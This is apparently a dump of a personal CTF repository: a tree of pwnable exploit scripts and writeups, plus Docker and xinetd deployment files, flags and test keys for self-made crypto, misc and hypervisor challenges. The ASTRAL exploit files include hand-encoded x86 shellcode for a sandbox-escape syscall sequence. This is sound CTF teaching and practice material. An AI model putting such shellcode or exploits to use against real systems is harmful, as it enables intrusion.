│ │ └── unexploitable │ └── wannaheap │ │ ├── exp.py │ │ └── wannaheap └── Pwnable.xyz │ ├── Add │ ├── add │ └── exp.py │ ├── AdultVM │ ├── exp.py │ ├── kernel │ ├── start.py │ └── userland │ ├── Attack │ ├── attack │ └── exp.py │ ├── BabyVM │ ├── babyvm │ └── exp.py │ ├── Badayum │ ├── badayum │ └── exp.py │ ├── Bookmark │ ├── bookmark │ └── exp.py │ ├── Car_shop │ ├── car_shop │ └── exp.py │ ├── Catalog │ ├── catalog │ └── exp.py │ ├── Child │ ├── child │ └── exp.py │ ├── Dirty_Turtle │ ├── dirty_turtle │ └── exp.py │ ├── Door │ ├── door │ └── exp.py │ ├── Executioner │ ├── executioner │ └── exp.py │ ├── ExecutionerV2 │ ├── executionerv2 │ └── exp.py │ ├── Fclose │ ├── exp.py │ └── fclose │ ├── Fishing │ ├── exp.py │ └── fishing │ ├── Free_spirit │ ├── exp.py │ └── free_spirit │ ├── Fspoo │ ├── exp.py │ └── fspoo │ ├── Game │ ├── exp.py │ └── game │ ├── Grownup │ ├── exp.py │ └── grownup │ ├── Hero_Factory │ ├── exp.py │ └── hero_factory │ ├── Iape │ ├── exp.py │ └── iape │ ├── JMP_table │ ├── exp.py │ └── jmp_table │ ├── JUMP │ ├── exp.py │ └── jump │ ├── Knum │ ├── exp.py │ └── knum │ ├── L33t_ness │ ├── exp.py │ └── l33t_ness │ ├── Message │ ├── exp.py │ └── message │ ├── Misalignment │ ├── exp.py │ └── misalignment │ ├── Nin │ ├── exp.py │ └── nin │ ├── Note │ ├── exp.py │ └── note │ ├── NoteV2 │ ├── exp.py │ └── notev2 │ ├── NoteV3 │ ├── exp.py │ ├── exp2.py │ └── notev3 │ ├── NoteV4 │ ├── exp.py │ └── notev4 │ ├── NoteV5 │ ├── exp.py │ └── notev5 │ ├── Notebook │ ├── exp.py │ └── notebook │ ├── Password │ ├── exp.py │ └── password │ ├── Punch_it │ ├── exp.py │ ├── genrand.c │ └── punch_it │ ├── PvE │ ├── exp.py │ └── pve │ ├── PvP │ ├── exp.py │ └── pvp │ ├── RWSR │ ├── exp.py │ └── rwsr │ ├── SUS │ ├── exp.py │ └── sus │ ├── Strcat │ ├── exp.py │ └── strcat │ ├── Sub │ ├── exp.py │ └── sub │ ├── TLSv00 │ ├── exp.py │ └── tlsv00 │ ├── Two_target │ ├── exp.py │ ├── exp2.py │ └── two_target │ ├── UAF │ ├── exp.py │ └── uaf │ ├── Welcome │ ├── exp.py │ └── welcome │ ├── Words │ ├── exp.py │ └── words │ ├── World │ ├── exp.py │ ├── genrand.c │ └── world │ └── XOR │ ├── exp.py │ └── xor ├── TIPS ├── crypto_resource ├── pwn_resource ├── python_resource ├── reverse_resource └── stego_resource ├── Teaching └── NTUComputerSecurity2020 │ ├── Pwn1 │ ├── CS2020_Pwn1.key │ ├── Demo │ │ ├── demo.py │ │ ├── leak │ │ └── leak.c │ └── README.md │ └── Pwn2 │ ├── CS2020_Pwn2.key │ ├── Demo │ ├── chunks │ ├── chunks.c │ ├── demo.py │ ├── largebin │ ├── largebin.c │ ├── smallbin │ ├── smallbin.c │ ├── tcache_and_fastbin │ ├── tcache_and_fastbin.c │ ├── unsortedbin │ └── unsortedbin.c │ └── README.md ├── Writeups ├── 0CTF2021 │ ├── HashCollision │ │ ├── Collision.zip │ │ ├── README.md │ │ ├── exp.py │ │ └── mixer.py │ └── README.md ├── Hacklu2023 │ ├── CustomOffice │ │ └── exp.py │ ├── DestinyDigits │ │ └── exp.py │ ├── FortuneBox │ │ └── exp.py │ ├── NewHouse │ │ └── exp.py │ ├── Pong │ │ └── exp.py │ └── RustyMix │ │ └── exp.py ├── HitconQual2019 │ ├── Pwn │ │ ├── Crypto_in_the_Shell │ │ │ ├── README.md │ │ │ ├── chall │ │ │ └── exp.py │ │ ├── EmojiVM │ │ │ ├── README.md │ │ │ ├── emojivm_misc │ │ │ │ ├── README.md │ │ │ │ ├── answer.txt │ │ │ │ └── sol.py │ │ │ ├── emojivm_pwn │ │ │ │ ├── README.md │ │ │ │ └── exp.py │ │ │ └── emojivm_reverse │ │ │ │ ├── chal.evm │ │ │ │ ├── emojivm │ │ │ │ └── emulator.py │ │ ├── Lazyhouse │ │ │ ├── exp.py │ │ │ ├── exp2.py │ │ │ └── lazyhouse │ │ ├── One_Punch_Man │ │ │ ├── README.md │ │ │ ├── exp.py │ │ │ └── one_punch │ │ └── Trick_or_Treat │ │ │ ├── README.md │ │ │ ├── exp.py │ │ │ └── trick_or_treat │ └── README.md └── UIUCTF2020 │ ├── Pwn │ ├── Accounting_Accidents │ │ ├── README.md │ │ ├── accounting │ │ ├── exp.py │ │ ├── fuzz.py │ │ └── gdbscript.py │ ├── Gen_Z_Math_Class │ │ └── src.zip │ ├── MuJS │ │ ├── Memorydump_Parser.py │ │ ├── Minimal_Reverse_Shell.py │ │ ├── MuJS.zip │ │ ├── README.md │ │ ├── exploit_required.js │ │ └── exploit_shell.js │ └── Who_is_GDB │ │ ├── Dockerfile │ │ ├── README.md │ │ └── exp.py │ └── README.md └── utils ├── Crypto ├── CRT.py ├── MathTools.py └── Wiener.py ├── Misc └── EXEC_AGENT.py ├── Pwn ├── DL_RESOLVE.py ├── IO_FILE.py ├── LD_CHANGER.py ├── LLDB_PEDA.py ├── SECCOMP.h ├── SECCOMP_ASSEMBLER.py ├── Shellcode.py └── libc │ ├── x64 │ ├── Libc23 │ │ ├── ld64_2.23.so │ │ └── libc64_2.23.so │ ├── Libc24 │ │ ├── ld64_2.24.so │ │ └── libc64_2.24.so │ ├── Libc27 │ │ ├── ld64_2.27.so │ │ └── libc64_2.27.so │ ├── Libc28 │ │ ├── ld64_2.28.so │ │ └── libc64_2.28.so │ ├── Libc29 │ │ ├── ld64_2.29.so │ │ └── libc64_2.29.so │ └── Libc31 │ │ ├── ld64_2.31.so │ │ └── libc64_2.31.so │ └── x86 │ ├── Libc23 │ ├── ld32_2.23.so │ └── libc32_2.23.so │ ├── Libc24 │ ├── ld32_2.24.so │ └── libc32_2.24.so │ └── Libc29 │ ├── ld32_2.29.so │ └── libc32_2.29.so ├── Python_sandbox └── PICKLE_ASSEMBLER.py ├── Reverse ├── GDB2HEX.py └── RESOLVEHEX.py └── Web └── FlaskCookie.py /MyChallenges/Crypto/Cute_Baby_Cats/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Cute Baby Cats 3 | 4 | Category : 5 | Crypto, Misc 6 | 7 | Desc : 8 | Cats are cute. Baby cats are cuter. 9 | 10 | Hint : 11 | 文字化け 12 | 13 | Estimated Difficulty : 14 | 5/10 15 | -------------------------------------------------------------------------------- /MyChallenges/Crypto/Cute_Baby_Cats/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8-buster 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -y 6 | RUN pip3 install --no-cache-dir pycryptodome 7 | 8 | RUN useradd -m CuteBabyCats 9 | RUN chown -R root:root /home/CuteBabyCats 10 | RUN chmod -R 755 /home/CuteBabyCats 11 | 12 | CMD ["/usr/sbin/xinetd","-dontfork"] 13 | -------------------------------------------------------------------------------- /MyChallenges/Crypto/Cute_Baby_Cats/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | cute_baby_cats: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/CuteBabyCats:ro 8 | - ./xinetd:/etc/xinetd.d/cute_baby_cats:ro 9 | ports: 10 | - "10106:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Crypto/Cute_Baby_Cats/distribute/share/myErrors.py: -------------------------------------------------------------------------------- 1 | #!/usr/sbin/python3 2 | 3 | class myError(Exception): 4 | errorname = 'MY ERROR' 5 | def __init__(self,msg): 6 | self.msg = msg 7 | def __str__(self): 8 | return f'{self.errorname} : {self.msg}' 9 | 10 | class formatError(myError): 11 | errorname = 'FORMAT ERROR' 12 | 13 | class lengthError(myError): 14 | errorname = 'LENGTH ERROR' 15 | 16 | class valueError(myError): 17 | errorname = 'VALUE ERROR' 18 | -------------------------------------------------------------------------------- /MyChallenges/Crypto/Cute_Baby_Cats/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 600 python3 /home/CuteBabyCats/server.py 5 | -------------------------------------------------------------------------------- /MyChallenges/Crypto/Cute_Baby_Cats/distribute/share/secret.py: -------------------------------------------------------------------------------- 1 | from userClass import User 2 | 3 | flag = 'flag{paddin6_or4c1e_2_un1c0de_length_inc0ns1stency_2_cut_and_p4ste_2_fl4g}' 4 | 5 | key = b'Avery_secure_key' 6 | iv = b'your_everyday_iv' 7 | user = User.construct('a lonely cat who wants a friend', 8 | 0, 9 | 0, 10 | 'hi i am cat M30W~ME0W~MEOW~M3OW') 11 | -------------------------------------------------------------------------------- /MyChallenges/Crypto/Cute_Baby_Cats/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service cute_baby_cats 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/CuteBabyCats/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = CuteBabyCats 10 | port = 10101 11 | flags = REUSE 12 | } 13 | 14 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Excellent_M30W_Store/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Excellent M30W Store 3 | 4 | Category : 5 | Misc 6 | 7 | Desc : 8 | I'm M30W, and I too sell cat stuff, sometimes I sell the flag... 9 | 10 | Hint : 11 | How does excel store stuff? 12 | 13 | Estimated Difficulty : 14 | 3/10 15 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Excellent_M30W_Store/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8-buster 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -y 6 | RUN pip3 install --no-cache-dir openpyxl 7 | RUN pip3 install --no-cache-dir xlcalculator 8 | 9 | RUN useradd -m ExcellentM30WStore 10 | RUN chown -R root:root /home/ExcellentM30WStore 11 | RUN chmod -R 755 /home/ExcellentM30WStore 12 | 13 | CMD ["/usr/sbin/xinetd","-dontfork"] 14 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Excellent_M30W_Store/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | excellent_m30w_store: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/ExcellentM30WStore:ro 8 | - ./xinetd:/etc/xinetd.d/ExcellentM30WStore:ro 9 | ports: 10 | - "10103:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Excellent_M30W_Store/distribute/share/Wishlist.xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Misc/Excellent_M30W_Store/distribute/share/Wishlist.xlsx -------------------------------------------------------------------------------- /MyChallenges/Misc/Excellent_M30W_Store/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 python3 /home/ExcellentM30WStore/server.py 5 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Excellent_M30W_Store/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service excellent_M30W_store 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/ExcellentM30WStore/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = ExcellentM30WStore 10 | port = 10101 11 | flags = REUSE 12 | } 13 | 14 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Matrix/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Matrix 3 | 4 | Category : 5 | Misc, ML?, Reverse?, Crypto? 6 | 7 | Desc : 8 | I'd like to share a revelation that I've had during my time here. 9 | It came to me when I tried to classify your species and I realized that you're not actually sentinent. 10 | Every creature on this planet instinctively develops a natural equilibrium with the surrounding environment but you AIs do not 11 | 12 | Estimated Difficulty : 13 | 9/10 14 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Matrix/README.md: -------------------------------------------------------------------------------- 1 | # Matrix 2 | 3 | | | Solves | Estimated Solves | 4 | | ----------- | ------ | ---------------- | 5 | | Matrix | 1/333 | 1/500 | 6 | 7 | ## Note 8 | 9 | Inspired by https://arxiv.org/abs/2112.12982, which explores recovering ReLU network parameters given classificaton probabilites. 10 | 11 | We restrict output to only classification results in this challenge. 12 | 13 | ## Writeup 14 | 15 | TBD 16 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Matrix/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9-buster 2 | MAINTAINER James 3 | 4 | ENV DEBIAN_FRONTEND noninteractive 5 | 6 | RUN apt-get update && apt-get install xinetd -qy 7 | RUN pip3 install --no-cache-dir numpy torch --index-url https://download.pytorch.org/whl/cpu 8 | RUN useradd -m Matrix 9 | 10 | CMD ["/usr/sbin/xinetd", "-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Matrix/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | matrix: 5 | build: . 6 | volumes: 7 | - ./share:/home/Matrix:ro 8 | - ./xinetd:/etc/xinetd.d/matrix:ro 9 | ports: 10 | - "10101:10101" 11 | expose: 12 | - "10101" 13 | restart: always 14 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Matrix/distribute/share/config.py: -------------------------------------------------------------------------------- 1 | FLAG = b'BALSN{f4ke_int3l1ig3nc3!}' 2 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Matrix/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | exec 2>/dev/null 4 | 5 | cd /home/Matrix 6 | timeout 600 python3 chal.py 7 | -------------------------------------------------------------------------------- /MyChallenges/Misc/Matrix/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service matrix 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/Matrix/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = Matrix 10 | groups = yes 11 | bind = 0.0.0.0 12 | port = 10101 13 | flags = REUSE 14 | } 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Nebula/distribute.diff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/Nebula/distribute.diff -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Neutron/distribute.diff: -------------------------------------------------------------------------------- 1 | Binary files StarryNight/hypervisor and Neutron/hypervisor differ 2 | Binary files StarryNight/kernel and Neutron/kernel differ 3 | Binary files StarryNight/processor and Neutron/processor differ 4 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Neutron/share/hypervisor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/Neutron/share/hypervisor -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Neutron/share/kernel: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/Neutron/share/kernel -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Neutron/share/processor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/Neutron/share/processor -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Protostar/distribute.diff: -------------------------------------------------------------------------------- 1 | Binary files Protostar/processor and StarryNight/processor differ 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Protostar/share/processor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/Protostar/share/processor -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Redgiant/distribute.diff: -------------------------------------------------------------------------------- 1 | Binary files StarryNight/hypervisor and Redgiant/hypervisor differ 2 | Binary files StarryNight/processor and Redgiant/processor differ 3 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Redgiant/share/hypervisor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/Redgiant/share/hypervisor -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Redgiant/share/processor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/Redgiant/share/processor -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04@sha256:b4b521bfcec90b11d2869e00fe1f2380c21cbfcd799ee35df8bd7ac09e6f63ea 2 | MAINTAINER James 3 | 4 | ENV DEBIAN_FRONTEND noninteractive 5 | 6 | RUN apt-get update && apt-get install xinetd libc6 -qy 7 | RUN useradd -m Astral 8 | RUN groupadd kvm && usermod -aG kvm Astral 9 | 10 | CMD /init && /usr/sbin/xinetd -dontfork 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | astral: 5 | build: . 6 | volumes: 7 | - ./share:/home/Astral:ro 8 | - ./xinetd:/etc/xinetd.d/astral:ro 9 | - ./init:/init:ro 10 | ports: 11 | - "10101:10101" 12 | expose: 13 | - "10101" 14 | devices: 15 | - "/dev/kvm:/dev/kvm" 16 | restart: always 17 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/init: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | chgrp kvm /dev/kvm 4 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/astralNebula: -------------------------------------------------------------------------------- 1 | BASLN{17_4ll_st4rts_w1th_dust5._Useles5_f1ndings_th4t_wh1rl_t0geth3r} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/astralNeutron: -------------------------------------------------------------------------------- 1 | BALSN{7h1s_1s_a_l1fe_0f_a_syst3m,_c0llasping_und3r_1ts_c0mplex1ty_4nd_f1n4lly_era5ed_fr0m_m3m0ry_4nd_s1ght} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/astralProtostar: -------------------------------------------------------------------------------- 1 | BALSN{Sl0wly,_th0se_f1ndings_man1fests_1nt0_bu9s,_1nt0_pr0t0types} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/astralRedgiant: -------------------------------------------------------------------------------- 1 | BALSN{Bugs_5w3ll_4nd_gr0w._0ne_d4y_1t_b3c0mes_s0_l4rge_1t_is_n0_l0ng3r_p0ssibl3_t0_m1ss._Th3n,_Pr1m1tiv3s_4re_b0rn} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/astralStarryNight: -------------------------------------------------------------------------------- 1 | BALSN{4nother_d4y._An0th3r_d1stant_syst3m_fl1ckers_and_d1es,_f4d1ng_int0_th3_gl00my_n1ght,_l1k3_tears_fr0m_4_star} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/astralSupernova: -------------------------------------------------------------------------------- 1 | BALSN{Pr1m1tiv3s_c0mm4nd_imm3ns3_p0wer._Wh3n_th3_t1me_c0mes,_3xpl0its_4ppear_and_expl0de_in_a_r4diant_bl4st} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/hypervisor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/hypervisor -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/kernel: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/kernel -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/processor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/processor -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | exec 2>/dev/null 4 | 5 | cd /home/Astral 6 | timeout 150 /home/Astral/hypervisor /home/Astral/processor /home/Astral/kernel /home/Astral/user 150 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/user: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/StarryNight/share/user -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/StarryNight/xinetd: -------------------------------------------------------------------------------- 1 | service astral 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/Astral/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = Astral 10 | groups = yes 11 | bind = 0.0.0.0 12 | port = 10101 13 | flags = REUSE 14 | } 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Supernova/distribute.diff: -------------------------------------------------------------------------------- 1 | Binary files StarryNight/hypervisor and Supernova/hypervisor differ 2 | Binary files StarryNight/processor and Supernova/processor differ 3 | Binary files StarryNight/user and Supernova/user differ 4 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Supernova/share/hypervisor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/Supernova/share/hypervisor -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Supernova/share/processor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/Supernova/share/processor -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/distribute/Supernova/share/user: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/distribute/Supernova/share/user -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/exploit/exploitNebula/exp_applet.aa: -------------------------------------------------------------------------------- 1 | load r0, 0x6900331cf73f6625 2 | load r1, 0 3 | load r2, 0 4 | load r3, 0x400000000 5 | invoke 6 | xor r0, r0 7 | xor r1, r1 8 | exit 9 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/exploit/exploitProtostar/exp_processor.aa: -------------------------------------------------------------------------------- 1 | load <8> r0, [r13] 2 | add r3, r13 3 | load <8> r0, 0 4 | //pad so jmp 0x48 has code 5 | load <8> r0, 0 6 | load <8> r0, 0 7 | load <8> r0, 0 8 | load <8> r0, 0 9 | load <8> r0, 0 10 | load <8> r0, 0 11 | load <8> r0, 0x02eb00000102bf90 // nop; mov edi, 0x102; jmp 2 12 | load <8> r0, 0x02eb54000000f368 // push 0xf3; push rsp; jmp 2 13 | load <8> r0, 0x02eb500104c0315e // pop rsi; xor eax, eax; add al, 1; push rax; jmp 2 14 | load <8> r0, 0x050f3cb0050f5a // pop rdx; syscall; mov al, 0x3c; syscall 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/exploit/exploitStarryNight/exp_applet.aa: -------------------------------------------------------------------------------- 1 | load r0, 0x6900331cf73f6625 2 | load r1, 0 3 | load r2, 0 4 | load r3, 0x400000000 5 | invoke 6 | xor r0, r0 7 | xor r1, r1 8 | exit 9 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/Nebula/sourcecode.diff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ASTRAL/sourcecode/Nebula/sourcecode.diff -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/Protostar/sourcecode.diff: -------------------------------------------------------------------------------- 1 | diff -r StarryNight/APPLET_PROCESSOR/processor.c Protostar/APPLET_PROCESSOR/processor.c 2 | 15a16 3 | > return SUCCESS; 4 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/APPLET/escrow.ab: -------------------------------------------------------------------------------- 1 | 4003004119003400000000000120023001015a21440400400a00fd401c00fd56005611ff3002085a2b42f3ff27995a8944ecff281050102f90fd400100fd3009105a9b42d9ff5010590a300208278950202f90300302513e59e33700633193a9d18f5ea530011059a2fe203130000850022f825a8144a7ff51022f92270030021059b15121fefd 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/APPLET_PROCESSOR/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | wget https://raw.githubusercontent.com/jwang-a/CTF/master/utils/Pwn/SECCOMP.h 4 | gcc -masm=intel -mno-red-zone processor.c jit.c device.c util.c sandbox.c -o processor -lssl -lcrypto 5 | rm SECCOMP.h 6 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/APPLET_PROCESSOR/sandbox.h: -------------------------------------------------------------------------------- 1 | #ifndef __SANDBOX_HEADER__ 2 | #define __SANDBOX_HEADER__ 3 | 4 | #include "util.h" 5 | #include "SECCOMP.h" 6 | 7 | void applySeccomp(); 8 | 9 | #endif 10 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/APPLET_PROCESSOR/snapshot.h: -------------------------------------------------------------------------------- 1 | #ifndef __SNAPSHOT_HEADER__ 2 | #define __SNAPSHOT_HEADER__ 3 | 4 | typedef struct SNAPSHOT { 5 | APPLET_TASK_ID task; 6 | uint8_t checkpointDigest[DIGEST_SIZE]; 7 | } SNAPSHOT; 8 | 9 | extern SNAPSHOT snapshot[APPLET_TASK_CNT_MAX]; 10 | 11 | #endif 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/APPLET_PROCESSOR/util.c: -------------------------------------------------------------------------------- 1 | #include "util.h" 2 | 3 | void __attribute__((noreturn)) printError(char *msg) { 4 | puts(msg); 5 | _exit(0); 6 | } 7 | 8 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/APPLET_PROCESSOR/util.h: -------------------------------------------------------------------------------- 1 | #ifndef __UTIL_HEADER__ 2 | #define __UTIL_HEADER__ 3 | 4 | #include 5 | #include 6 | 7 | void __attribute__((noreturn)) printError(char *msg); 8 | 9 | #endif 10 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/HYPERVISOR/applet.h: -------------------------------------------------------------------------------- 1 | #ifndef __APPLET_HEADER__ 2 | #define __APPLET_HEADER__ 3 | 4 | #define APPLET_ID uint64_t 5 | #define APPLET_TASK_ID uint64_t 6 | 7 | #define APPLET_SIZE_MAX 0x1000 8 | #define APPLET_ARG_SIZE_MAX 0x1000 9 | #define APPLET_RES_SIZE_MAX 0x1000 10 | #define APPLET_STORAGE_SIZE 0x1000 11 | 12 | #define APPLET_REG_CNT 0x10 13 | #define APPLET_CONTEXT_MEMORY_SIZE 0x5000 14 | 15 | 16 | #endif 17 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/HYPERVISOR/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | gcc device.c hypercall.c hypervisor.c interrupt.c util.c -o hypervisor -lssl -lcrypto 4 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/HYPERVISOR/const.h: -------------------------------------------------------------------------------- 1 | #ifndef __CONST_HEADER__ 2 | #define __CONST_HEADER__ 3 | 4 | #define DIGEST_PAYLOAD_SIZE_MAX 0x2000 5 | #define DIGEST_SIZE 0x20 6 | #define SIGNATURE_SIZE 0x100 7 | 8 | #define FLAG_SIZE_MAX 0x100 9 | #define APPLETSPACE_FLAG_FNAME "/home/Astral/astralNebula" 10 | #define PROCESSORSPACE_FLAG_FNAME "/home/Astral/astralProtostar" 11 | #define USERSPACE_FLAG_FNAME "/home/Astral/astralRedgiant" 12 | #define KERNELSPACE_FLAG_FNAME "/home/Astral/astralSupernova" 13 | 14 | #endif 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/HYPERVISOR/interrupt.h: -------------------------------------------------------------------------------- 1 | #ifndef 